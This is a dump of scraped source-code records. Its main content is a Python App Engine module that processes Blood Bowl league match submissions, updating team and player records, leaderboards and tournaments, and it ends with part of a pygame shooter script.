"tensorflow.constant", "line_number": 205, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 205, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 206, "usage_type": "call"}, {"api_name": "tensorflow.abs", "line_number": 206, "usage_type": "call"}, {"api_name": "tensorflow.subtract", "line_number": 206, "usage_type": "call"}, {"api_name": 
"tensorflow.add", "line_number": 210, "usage_type": "call"}, {"api_name": "tensorflow.gradients", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 218, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 238, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 253, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 253, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 254, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 254, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 255, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 255, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 256, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 256, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 258, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 258, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 259, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 259, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 260, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 260, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 261, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 261, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 263, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 264, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 264, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 265, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 265, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 266, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 266, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 267, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 267, "usage_type": "name"}, {"api_name": "model.conv_net", "line_number": 274, "usage_type": "argument"}]}
+{"seq_id": "41213090574", "text": "\nfrom google.appengine.api.labs import taskqueue\nfrom google.appengine.api import mail\nfrom google.appengine.ext import db\nimport re, logging, random, datetime\n\nfrom models import *\nfrom grappl.utils import batch_put\nimport views, misc\n\n\ndef prepare_submit(data, handler=None, localtest=False):\n\n def read_and_delete(key):\n ret = data.get(key)\n if ret:\n del data[key]\n return ret\n else:\n return \"\"\n\n signature = read_and_delete(\"signature\")\n md5 = read_and_delete(\"md5\")\n disconnect = bool(read_and_delete(\"disconnect\"))\n bblog = read_and_delete(\"bblog\")\n\n # get team entities\n team_names = [data[\"home_name\"], data[\"away_name\"]]\n teams = [Team.get_or_insert(name) for name in team_names]\n\n # this is our match lookup aid\n match_lookup = MatchLookup.get_or_insert(MatchLookup.get_key_name(teams))\n logging.debug(\"looked up %s\" % match_lookup.get_string())\n\n # There is a race condition here. We need to refetch the last\n # match inside a transaction before we create the new match.\n def get_or_create_match():\n previous_matches = Match.all().ancestor(\n match_lookup).order(\"-created\").fetch(1)\n\n if previous_matches:\n last_match = previous_matches[0]\n last_md5 = SubmitData.all().ancestor(last_match).get().md5\n else:\n last_match = None\n last_md5 = None\n\n # Create the match if any of the following are true:\n # * their is no prior match on record between these two teams\n # * the MD5 hashes of this submit and the submit of the last match don't\n # match up\n if not last_match or last_md5 != md5:\n match = Match(parent = match_lookup, disconnect = disconnect)\n match.put()\n created = True\n else:\n match = last_match\n match.both_submitted = True\n match.put()\n created = False\n\n submit_data = SubmitData(\n key_name = signature,\n parent = match,\n disconnect = disconnect,\n md5 = md5,\n data = data,\n bblog = bblog)\n submit_data.put()\n\n return (match, submit_data, created)\n\n logging.debug(\"calling get_or_create_match for %s\" % match_lookup.get_string())\n match, submit_data, created = db.run_in_transaction(get_or_create_match)\n\n if created:\n try:\n # if we created the match, we will initiate processing\n logging.debug(\"match %s created\" % match_lookup.get_string())\n\n if localtest:\n # dev_appserver has no support for tasks so we do it manually\n process_submit(submit_data, localtest=localtest)\n \n else:\n logging.debug(\"match %s updated; spawning submit task\" %\n match_lookup.get_string())\n\n taskqueue.add(url=\"/grappl/tasks/submit\", params={\n 'submit_data_key_string': submit_data.key(),\n })\n\n # if we receive an exception delete the match to allow a retry\n except:\n match.delete()\n submit_data.delete()\n raise\n\n else:\n # check to make sure everything is consistent\n submit_data2 = SubmitData.all().ancestor(\n match).filter(\"__key__ !=\", submit_data.key()).fetch(1)[0]\n\n my_data = submit_data.data\n their_data = submit_data2.data\n\n assert_log = misc.AssertLog(match_lookup.get_string())\n for key in my_data.keys():\n assert_log.check(my_data[key], their_data[key], \"my %s\" % key)\n\n for key in their_data.keys():\n assert_log.check(their_data[key], my_data[key], \"their %s\" % key)\n\n if assert_log.mail():\n logging.warning(\"%s verification failed.\" % match_lookup.get_string())\n\n\ndef process_submit(submit_data, localtest=False):\n \"\"\"Submit the match.\n \n Ideally we want this whole post to be a transaction, but it would require us\n to lock the whole datastore 
which is not GAE-like. We can take advantage of\n memcache to ensure that the updates won't become visible to the web page\n until we're done and we clear out the relevant memcache entries.\n\n Still, we want to not commit the match record entries (TeamRecord and\n PlayerRecord) until the last possible moment to make the possibility of a\n parallel memcache clear presenting an inconsistent view to the users view\n maximally unlikely.\"\"\"\n\n data = submit_data.data\n match = submit_data.parent()\n match_lookup = match.parent()\n\n assert_log = misc.AssertLog(match_lookup.get_string())\n\n # First extract the information into the right categories:\n # team data,\n # team record data,\n # team player data, and\n # team player record data\n #--------------------------------------------------------------------#\n\n both_team_data = ({}, {})\n both_players_data = ({}, {})\n\n both_team_record_data = ({}, {})\n both_player_records_data = ({}, {})\n\n def str_getter(val): return val # do not use str() in case of unicode\n def int_getter(val): return int(val)\n def bool_getter(val):\n if val:\n return True\n else:\n return False\n\n # ReferenceProperties\n def position_getter(val): return db.Key.from_path(\"Position\", val)\n def race_getter(val): return db.Key.from_path(\"Race\", val)\n\n def skills_getter(val): \n skills = []\n for skill_name in [s.strip() for s in val.split(\",\")]:\n if skill_name:\n skills.append(db.Key.from_path(\"Skill\", skill_name))\n return skills\n\n def injuries_getter(val): \n injuries = []\n for injury_name in [s.strip() for s in val.split(\",\")]:\n if injury_name:\n injuries.append(db.Key.from_path(\"Injury\", injury_name))\n return injuries\n\n team_attr_map = {\n # fixed\n \"name\": (True, str_getter),\n \"race\": (True, race_getter),\n \"logo\": (True, str_getter),\n \"color\": (True, int_getter),\n\n # profile\n \"cash\": (False, int_getter),\n \"ff\": (False, int_getter),\n \"rerolls\": (False, int_getter),\n \"apoths\": (False, int_getter),\n \"cheers\": (False, int_getter),\n \"coaches\": (False, int_getter),\n\n # stats\n \"result\": (False, int_getter),\n \"tv_for\": (False, int_getter),\n \"tv_against\": (False, int_getter),\n }\n\n player_attr_map = {\n # fixed\n \"number\": (True, int_getter),\n \"bb_id\": (True, int_getter),\n \"position\": (True, position_getter),\n \"name\": (True, str_getter),\n\n # profile\n \"mv\": (False, int_getter),\n \"st\": (False, int_getter),\n \"ag\": (False, int_getter),\n \"av\": (False, int_getter),\n \"level\": (False, int_getter),\n \"spp\": (False, int_getter),\n \"value\": (False, int_getter),\n \"skills\": (False, skills_getter),\n \"injuries\": (False, injuries_getter),\n\n # other\n \"match_injuries\": (False, injuries_getter),\n\n # stats\n \"played\": (False, int_getter),\n \"mvps\": (False, int_getter),\n \"tds_for\": (False, int_getter),\n \"passes_for\": (False, int_getter),\n \"pyards_for\": (False, int_getter),\n \"rec_for\": (False, int_getter),\n \"ryards_for\": (False, int_getter),\n \"int_for\": (False, int_getter),\n \"int_against\": (False, int_getter),\n \"tckl_for\": (False, int_getter),\n \"tckl_against\": (False, int_getter),\n \"kills_for\": (False, int_getter),\n \"kills_against\": (False, int_getter),\n \"cas_for\": (False, int_getter),\n \"cas_against\": (False, int_getter),\n \"ko_for\": (False, int_getter),\n \"ko_against\": (False, int_getter),\n \"stun_for\": (False, int_getter),\n \"stun_against\": (False, int_getter),\n \"inj_for\": (False, int_getter),\n \"inj_against\": (False, 
int_getter),\n }\n\n player_stat_regex = re.compile(\n r\"(?P\\w+)_(?Pp\\d+)_(?P\\w+)\")\n\n for key, value in sorted(data.items()):\n hit = player_stat_regex.match(key)\n if hit:\n # it's a player attribute\n\n def get_map(team_id, player_id, is_player_data):\n index = (0 if team_id == \"home\" else 1)\n data = (both_players_data if is_player_data else\n both_player_records_data)\n\n return data[index].setdefault(player_id, {})\n\n team_id, player_id, attr = [str(x) for x in hit.groups()]\n is_player_data, converter = player_attr_map[attr]\n map = get_map(team_id, player_id, is_player_data)\n\n else:\n # it's a team attribute\n\n def get_map(is_team_data):\n index = (0 if team_id == \"home\" else 1)\n data = (both_team_data if is_team_data else\n both_team_record_data)\n\n return data[index]\n\n team_id, attr = [str(x) for x in key.split(\"_\", 1)]\n is_team_data, converter = team_attr_map[attr]\n map = get_map(is_team_data)\n\n map[attr] = converter(value)\n\n\n # Build team aggregate statistics\n #--------------------------------------------------------------------#\n \n for which_team, team_record_data in enumerate(both_team_record_data):\n for attr in sorted(TeamStats.properties()):\n if attr.startswith(\"tv_\"):\n # these are already handled\n continue\n\n if \"for\" in attr:\n opp_attr = attr.replace(\"for\", \"against\")\n else:\n opp_attr = attr.replace(\"against\", \"for\")\n\n def compute_aggregate(which_team, attr):\n return sum([v.get(attr, 0) for v in\n both_player_records_data[which_team].values()])\n\n inputs = ((which_team, attr), (which_team ^ 1, opp_attr))\n sums = [compute_aggregate(*input) for input in inputs]\n\n if all([s != 0 for s in sums]) and not any(\n [x for x in (\"cas_\", \"kills_\", \"stun_\", \"ko_\") if x in attr]):\n assert_log.check(sums[0], sums[1], context=\"aggregate sum for %s\" % attr)\n\n # as a safety, in case we fail we take the maximum of the two\n team_record_data[attr] = max(sums)\n\n # Now build the actual models\n #--------------------------------------------------------------------#\n\n both_teams = []\n both_team_records = []\n both_players = ([], [])\n both_player_records = ([], [])\n\n for team_data in both_team_data:\n # Again, like match, we need to create (\"put\") the team if it doesn't\n # already exist. Fortunately this is an idempotent operation.\n team = Team.get_by_key_name(team_data['name'])\n team.race = team_data['race']\n team.logo = get_logo(team_data['logo'])\n team.color = get_color(team_data['color'])\n team.last_active = datetime.date.today()\n team.retired = False\n both_teams.append(team)\n\n for which_team, team_record_data in enumerate(both_team_record_data):\n team = both_teams[which_team]\n team_record_data[\"parent\"] = match\n team_record_data[\"key_name\"] = \"%s\" % which_team\n team_record_data[\"tv\"] = team_record_data[\"tv_for\"]\n team_record_data[\"disconnect\"] = submit_data.disconnect\n team_record_data[\"team\"] = team\n team_record_data[\"glicko_r\"] = team.glicko_r\n team_record_data[\"glicko_RD\"] = team.glicko_RD\n team_record_data[\"status\"] = team.status\n\n both_team_records.append(TeamRecord(**team_record_data))\n\n for which_team, players_data in enumerate(both_players_data):\n for player_key, player_data in players_data.items():\n # For the players, just like with the teams and the match, we need to\n # create (\"put\") the entities first before we can do anything with\n # them. 
Just like with the teams, this is an idempotent operation.\n team = both_teams[which_team]\n player_data[\"team\"] = team.key()\n player = Player.create(**player_data)\n both_players[which_team].append(player)\n\n for which_team, player_records_data in enumerate(\n both_player_records_data):\n for which_player, player_record_data in enumerate(\n player_records_data.values()):\n\n player_record_data[\"parent\"] = match\n player_record_data[\"key_name\"] = \"%s:%s\" % (which_team, which_player)\n player_record_data[\"player\"] = (\n both_players[which_team][which_player])\n player_record = PlayerRecord(**player_record_data)\n\n both_player_records[which_team].append(player_record)\n\n # Prepare to commit\n #--------------------------------------------------------------------#\n put_list = []\n\n # Update records\n for players, player_records in zip(both_players, both_player_records):\n for player, player_record in zip(players, player_records):\n put_list.append(player)\n put_list.append(player_record)\n\n for team, team_record in zip(both_teams, both_team_records):\n put_list.append(team)\n put_list.append(team_record)\n\n # Commit\n #--------------------------------------------------------------------#\n\n # Batch commit! This is as close to a transaction as we are going to get.\n logging.debug(\"preparing to commit phase 1 %s \" % match_lookup.get_string())\n batch_put(put_list)\n\n put_list = []\n # Add some last-minute links to speed things up. We couldn't do this before\n # because the entities we're linking to didn't exist in the datastore yet\n for which_team, (team, team_record) in enumerate(zip(both_teams, both_team_records)):\n team_record.opponent_record = both_team_records[which_team ^ 1]\n put_list.append(team_record)\n\n for player_record in both_player_records[which_team]:\n player_record.team_record = team_record\n put_list.append(player_record)\n\n logging.debug(\"preparing to commit phase 2 %s \" % match_lookup.get_string())\n db.put(put_list)\n\n # Done!\n logging.debug(\"submit task for %s terminating successfully\" %\n match_lookup.get_string())\n\n match.processed = True\n match.put()\n\n assert_log.mail()\n\n if localtest:\n # dev_appserver has no support for tasks so we do it manually\n process_update(match)\n else:\n logging.debug(\"spawning update task for %s\" % match_lookup.get_string())\n\n # We do this separately because otherwise we run up against the 30 second\n # limit\n taskqueue.add(url=\"/grappl/tasks/update\", params={\n 'match_key_string': match.key(),\n })\n\n\ndef process_update(match):\n match_lookup = match.parent()\n put_list = []\n\n logging.debug(\"preparing to update for %s\" % match_lookup.get_string())\n\n assert_log = misc.AssertLog(match_lookup.get_string())\n season, week = misc.get_ofl_season_and_week()\n\n # Update team information\n #--------------------------------------------------------------------#\n\n team_records = list(match.get_team_records_query())\n teams = [record.team for record in team_records]\n coach_stats_list = []\n \n for team, team_record in zip(teams, team_records):\n\n # this check is to make sure we only do this once (for idempotence) in case\n # of a retry\n if team.teamrecord_set.count() > team.matches:\n team.update(team_record)\n coach = team.coach\n if coach:\n coach.last_active = datetime.date.today()\n coach_stats = CoachStats.all().ancestor(coach).get()\n coach_stats.update(team_record)\n coach_stats_list.append(coach_stats)\n\n # OFTL eligibility rule checks\n if not team.check_eligibility(season=season):\n 
team.set_flag(TeamProfile.INELIGIBLE_FLAG)\n\n # retirement (not by death)\n active_player_count = 0\n player_keys = [pr.player.key() for pr in team_record.playerrecord_set]\n for player in team.player_set:\n if not player.key() in player_keys:\n if player.retired == False:\n player.retired = True\n put_list.append(player)\n\n if not player.retired:\n active_player_count += 1\n\n # boost TV for potential loners\n if active_player_count < 11:\n team.tv += (11 - active_player_count) * 50\n\n # Update player information\n #--------------------------------------------------------------------#\n\n player_records = list(match.get_player_records_query())\n players = [record.player for record in player_records]\n\n # Structure to map to the already-updated player team.\n # We use this map because 'player.team' and the same team indexed in\n # 'teams' do not point to the same object. To avoid conflict we\n # update the one in 'teams' through the map\n team_map = dict((t.key(), t) for t in teams)\n\n # Keep track of the number of players that violate the SPP check. Allow one\n # violation for journeyman hire, which is impossible to track otherwise.\n violation_set = set()\n for player, player_record in zip(players, player_records):\n if not player.team:\n # journeyman / star player\n continue\n\n if player.matches == 0 and player_record.is_empty():\n # a journeyman/necro/nurgle hire that may have acquired SPP in-game\n continue\n\n if player.team.key() not in team_map:\n assert player_record.is_empty()\n # Unfortunately BB assigns a journeyman/necro/nurgle hire an arbitrary id\n # that may conflict with an existing OFTL player from a different team.\n # In this case, player.matches != 0. This code is a safety net.\n continue\n\n # this check is to make sure we only do this once (for idempotence) in case\n # of a retry\n if player.playerrecord_set.count() > player.matches:\n\n # OFTL rule checks\n if not assert_log.check(player_record.spp, player.spp,\n \"%s %s (%s) expected spp\" % (\n player.team.key().name(), player.name, player.key().name())):\n\n # allow one violation for a journeyman hire before setting the\n # inconsistent flag\n if player.spp != 0 or (player.team.key() in violation_set):\n team_map[player.team.key()].set_flag(TeamProfile.INCONSISTENT_FLAG)\n\n violation_set.add(player.team.key())\n\n tv_delta = player.update(player_record)\n if tv_delta:\n team_map[player.team.key()].tv += tv_delta\n\n put_list.extend(coach_stats_list)\n put_list.extend(teams)\n put_list.extend(players)\n batch_put(put_list)\n\n # Update Race Statistics\n #--------------------------------------------------------------------#\n update_race_statistics(teams, team_records)\n \n # Update leader information\n #--------------------------------------------------------------------#\n\n update_coach_leaders(coach_stats_list)\n update_team_leaders(teams)\n update_player_leaders(players)\n\n # Update tournament details\n #--------------------------------------------------------------------#\n\n match_up = match_lookup.tournamentmatchup_set.get() \n\n # disqualify team if played match outside of tournament\n for team in teams:\n active_membership = team.get_active_tournament_membership()\n if active_membership and (not match_up or\n match_up.parent().key() != active_membership.parent().key()):\n\n active_tournament = active_membership.parent()\n if active_tournament.started:\n mail.send_mail(\n sender=\"verification@bb-oftl-hrd.appspotmail.com\",\n to=\"balderasfam@gmail.com\",\n subject=\"OFTL rules violation\",\n 
body=\"%s played outside of %s\\n\" % (\n team.key().name(), active_tournament.key().name()))\n else:\n # force withdraw\n active_membership.delete()\n\n # there can only be one tournament for this match\n if match_up:\n tournament = match_up.parent()\n\n # determine the winner\n if team_records[0].result == 0:\n # decide the winner by a 'coin flip'. Seed the random number generator by\n # the match key to make it deterministic in case we need to retry\n random.seed(str(match.key()))\n winner_index = random.choice([0, 1])\n else:\n winner_index = 0 if team_records[0].result == 1 else 1\n\n winner = teams[winner_index]\n winner = winner.tournamentmembership_set.ancestor(tournament).get()\n\n loser = teams[winner_index ^ 1]\n loser = loser.tournamentmembership_set.ancestor(tournament).get()\n\n if match_up.advance(winner, loser, match):\n update_team_leaders([winner.team])\n\n views.TournamentBox.clear(tournament.key())\n views.Tournaments.clear()\n \n # Evict relevant pages from memcache so they are regenerated\n #--------------------------------------------------------------------#\n\n for team in teams:\n views.TeamBox.clear(team.key())\n\n for player in players:\n views.PlayerBox.clear(player.key())\n\n views.RecentMatches.clear()\n views.LeagueStandings.clear()\n views.TeamLeaders.clear()\n views.PlayerLeaders.clear()\n views.CoachLeaders.clear()\n views.GeneralStatistics.clear()\n\n assert_log.mail()\n logging.debug(\"update successful for %s\" % match_lookup.get_string())\n\ndef update_race_statistics(teams, team_records):\n # If two teams of same race are playing against each other then\n # we have to run race_stats.update(team_record) twice, once for each\n # team. THEN we can queue the put.\n \n put_list = []\n\n if (teams[0].race == teams[1].race):\n race_stats = RaceStats.all().filter(\"race =\", team.race).get()\n for team, team_record in zip(teams, team_records):\n race_stats.update(team_record)\n put_list.append(race_stats)\n else:\n for team, team_record in zip(teams, team_records):\n race_stats = RaceStats.all().filter(\"race =\", team.race).get()\n race_stats.update(team_record)\n put_list.append(race_stats)\n\n batch_put(put_list)\n \ndef update_coach_leaders(coach_stats_list):\n \"\"\"Update coach leader standings\"\"\"\n put_list = []\n\n # update leader standings for each Coach\n for leader in CoachLeader.all():\n for coach_stats in coach_stats_list:\n put_list.append(CoachLeaderStanding(\n key_name = coach_stats.parent().key().name(),\n parent = leader,\n coach_stats = coach_stats,\n score = leader.get_score(coach_stats)))\n\n batch_put(put_list)\n \ndef update_team_leaders(teams):\n \"\"\"Update team leader standings\"\"\"\n put_list = []\n\n # update leader standings for each team\n for leader in TeamLeader.all():\n for team in teams:\n if team.matches == 0:\n # pre-registered team\n continue\n\n put_list.append(TeamLeaderStanding(\n key_name = team.key().name(),\n parent = leader,\n team = team,\n score = leader.get_score(team)))\n\n batch_put(put_list)\n\n\ndef update_player_leaders(players):\n \"\"\"Update player leader standings\"\"\"\n put_list = []\n\n # update leader standings for each player\n for leader in PlayerLeader.all():\n for player in players:\n if not player.key().name() or player.played == 0:\n # omit journeymen/star players and players that have not played\n continue\n\n put_list.append(PlayerLeaderStanding(\n key_name = player.key().name(),\n parent = leader,\n player = player,\n score = leader.get_score(player)))\n\n batch_put(put_list)\n\n\ndef 
get_color(num):\n if num>55:\n num=55\n\t\n color_map = {\n 0: (85 , 209, 255),\n 1: (112, 254, 202),\n 2: (151, 246, 14 ),\n 3: (246, 255, 0 ),\n 4: (241, 186, 138),\n 5: (255, 123, 246),\n 6: (224, 104, 254),\n 7: (223, 229, 229),\n 8: (85 , 169, 255),\n 9: (0 , 255, 252),\n 10: (0 , 255, 0 ),\n 11: (255, 222, 0 ),\n 12: (255, 147, 147),\n 13: (255, 85 , 243),\n 14: (180, 123, 255),\n 15: (192, 191, 191),\n 16: (8 , 130, 255),\n 17: (3 , 219, 216),\n 18: (107, 221, 14 ),\n 19: (239, 189, 16 ),\n 20: (255, 83 , 83 ),\n 21: (246, 0 , 229),\n 22: (158, 85 , 255),\n 23: (170, 170, 170),\n 24: (20 , 60 , 212),\n 25: (2 , 168, 166),\n 26: (95 , 200, 9 ),\n 27: (204, 117, 41 ),\n 28: (244, 0 , 0 ),\n 29: (158, 0 , 147),\n 30: (106, 0 , 246),\n 31: (109, 109, 109),\n 32: (38 , 77 , 176),\n 33: (1 , 108, 107),\n 34: (77 , 111, 3 ),\n 35: (140, 78 , 29 ),\n 36: (180, 0 , 0 ),\n 37: (90 , 0 , 84 ),\n 38: (68 , 0 , 158),\n 39: (62 , 62 , 62 ),\n 40: (37 , 61 , 121),\n 41: (1 , 78 , 64 ),\n 42: (40 , 74 , 7 ),\n 43: (90 , 55 , 25 ),\n 44: (128, 0 , 0 ),\n 45: (54 , 37 , 78 ),\n 46: (48 , 4 , 105),\n 47: (24 , 24 , 24 ),\n 48: (21 , 35 , 69 ),\n 49: (1 , 45 , 37 ),\n 50: (27 , 50 , 5 ),\n 51: (52 , 29 , 9 ),\n 52: (74 , 0 , 0 ),\n 53: (31 , 21 , 45 ),\n 54: (28 , 2 , 60 ),\n 55: (14 , 14 , 14 ),\n }\n\n def get_two_char_hex_string(val):\n s = str(hex(val))[2:4]\n if len(s) == 1:\n s = \"0\" + s\n return s\n\n return '#' + \"\".join(get_two_char_hex_string(val) for val in color_map[num])\n\n\ndef get_logo(logo):\n logo = \"logo_%s.png\" % logo.lower()\n logos = open(\"./logos.txt\")\n for line in logos:\n if line.strip() == logo:\n break\n else:\n logo = \"logo_neutre_07.png\"\n logos.close()\n return logo\n\n\n", "repo_name": "midnjerry/bb-oftl-hrd", "sub_path": "grappl/submit.py", "file_name": "submit.py", "file_ext": "py", "file_size_in_byte": 24670, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.debug", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 73, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.run_in_transaction", "line_number": 74, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 74, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 79, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 86, "usage_type": "call"}, {"api_name": "google.appengine.api.labs.taskqueue.add", "line_number": 89, "usage_type": "call"}, {"api_name": "google.appengine.api.labs.taskqueue", "line_number": 89, "usage_type": "name"}, {"api_name": "misc.AssertLog", "line_number": 107, "usage_type": "call"}, {"api_name": "logging.warning", "line_number": 115, "usage_type": "call"}, {"api_name": "misc.AssertLog", "line_number": 135, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 159, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key", "line_number": 159, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 159, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 160, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key", "line_number": 160, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 160, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 166, "usage_type": "call"}, {"api_name": 
"google.appengine.ext.db.Key", "line_number": 166, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 166, "usage_type": "name"}, {"api_name": "google.appengine.ext.db.Key.from_path", "line_number": 173, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.Key", "line_number": 173, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.db", "line_number": 173, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 242, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 321, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 321, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 379, "usage_type": "call"}, {"api_name": "grappl.utils.batch_put", "line_number": 380, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 393, "usage_type": "call"}, {"api_name": "google.appengine.ext.db.put", "line_number": 394, "usage_type": "call"}, {"api_name": "google.appengine.ext.db", "line_number": 394, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 397, "usage_type": "call"}, {"api_name": "logging.debug", "line_number": 409, "usage_type": "call"}, {"api_name": "google.appengine.api.labs.taskqueue.add", "line_number": 413, "usage_type": "call"}, {"api_name": "google.appengine.api.labs.taskqueue", "line_number": 413, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 422, "usage_type": "call"}, {"api_name": "misc.AssertLog", "line_number": 424, "usage_type": "call"}, {"api_name": "misc.get_ofl_season_and_week", "line_number": 425, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 442, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 442, "usage_type": "attribute"}, {"api_name": "grappl.utils.batch_put", "line_number": 521, "usage_type": "call"}, {"api_name": "google.appengine.api.mail.send_mail", "line_number": 547, "usage_type": "call"}, {"api_name": "google.appengine.api.mail", "line_number": 547, "usage_type": "name"}, {"api_name": "random.seed", "line_number": 565, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 566, "usage_type": "call"}, {"api_name": "views.TournamentBox.clear", "line_number": 579, "usage_type": "call"}, {"api_name": "views.TournamentBox", "line_number": 579, "usage_type": "attribute"}, {"api_name": "views.Tournaments.clear", "line_number": 580, "usage_type": "call"}, {"api_name": "views.Tournaments", "line_number": 580, "usage_type": "attribute"}, {"api_name": "views.TeamBox.clear", "line_number": 586, "usage_type": "call"}, {"api_name": "views.TeamBox", "line_number": 586, "usage_type": "attribute"}, {"api_name": "views.PlayerBox.clear", "line_number": 589, "usage_type": "call"}, {"api_name": "views.PlayerBox", "line_number": 589, "usage_type": "attribute"}, {"api_name": "views.RecentMatches.clear", "line_number": 591, "usage_type": "call"}, {"api_name": "views.RecentMatches", "line_number": 591, "usage_type": "attribute"}, {"api_name": "views.LeagueStandings.clear", "line_number": 592, "usage_type": "call"}, {"api_name": "views.LeagueStandings", "line_number": 592, "usage_type": "attribute"}, {"api_name": "views.TeamLeaders.clear", "line_number": 593, "usage_type": "call"}, {"api_name": "views.TeamLeaders", "line_number": 593, "usage_type": "attribute"}, {"api_name": "views.PlayerLeaders.clear", "line_number": 594, "usage_type": "call"}, {"api_name": "views.PlayerLeaders", "line_number": 594, "usage_type": "attribute"}, {"api_name": 
"views.CoachLeaders.clear", "line_number": 595, "usage_type": "call"}, {"api_name": "views.CoachLeaders", "line_number": 595, "usage_type": "attribute"}, {"api_name": "views.GeneralStatistics.clear", "line_number": 596, "usage_type": "call"}, {"api_name": "views.GeneralStatistics", "line_number": 596, "usage_type": "attribute"}, {"api_name": "logging.debug", "line_number": 599, "usage_type": "call"}, {"api_name": "grappl.utils.batch_put", "line_number": 619, "usage_type": "call"}, {"api_name": "grappl.utils.batch_put", "line_number": 634, "usage_type": "call"}, {"api_name": "grappl.utils.batch_put", "line_number": 653, "usage_type": "call"}, {"api_name": "grappl.utils.batch_put", "line_number": 673, "usage_type": "call"}]}
+{"seq_id": "34414766495", "text": "import pygame\nimport os,sys\nimport Player\nimport pBullet\nimport Level\npygame.init()\n\nSCREENHEIGHT = 480\nSCREENWIDTH = 640\nscreen = pygame.display.set_mode((SCREENWIDTH,SCREENHEIGHT))\npygame.display.set_caption(\"Bullets\")\npygame.key.set_repeat(100,100)\nbackground = pygame.Surface(screen.get_size())\nbackground = background.convert()\nlevels = [Level.Level(\"A8B4C4D6\",650,SCREENHEIGHT,SCREENWIDTH,1),Level.Level(\"C4A2B3D1D2D3D4D5\",1100,SCREENHEIGHT,SCREENWIDTH,2)]\nactivelevel = 0\n#player = Player.Player(310,240,30,30,(0,0,255))\n#fbullet = pygame.sprite.Group()\nlastFiring = 0\nclock = pygame.time.Clock()\nwon = False\nscore = [0]\nscorefont = pygame.font.Font(None,40)\n\ndone = False\nwhile not done:\n if pygame.event.peek():\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n done = True\n if event.key == pygame.K_LSHIFT:\n levels[activelevel].player.focus(True)\n if event.key == pygame.K_UP:\n levels[activelevel].player.moveV(-6)\n if event.key == pygame.K_DOWN:\n levels[activelevel].player.moveV(6)\n if event.key == pygame.K_RIGHT:\n levels[activelevel].player.moveH(6)\n if event.key == pygame.K_LEFT:\n levels[activelevel].player.moveH(-6)\n elif event.type == pygame.KEYUP:\n if not pygame.key.get_pressed()[pygame.K_UP] and not pygame.key.get_pressed()[pygame.K_DOWN]:\n levels[activelevel].player.moveV(0)\n if not pygame.key.get_pressed()[pygame.K_RIGHT] and not pygame.key.get_pressed()[pygame.K_LEFT]:\n levels[activelevel].player.moveH(0)\n if event.key == pygame.K_LSHIFT:\n levels[activelevel].player.focus(False)\n \n if pygame.key.get_pressed()[pygame.K_SPACE] and lastFiring > 200:\n bullet = levels[activelevel].player.shoot()\n levels[activelevel].collective.add(bullet)\n 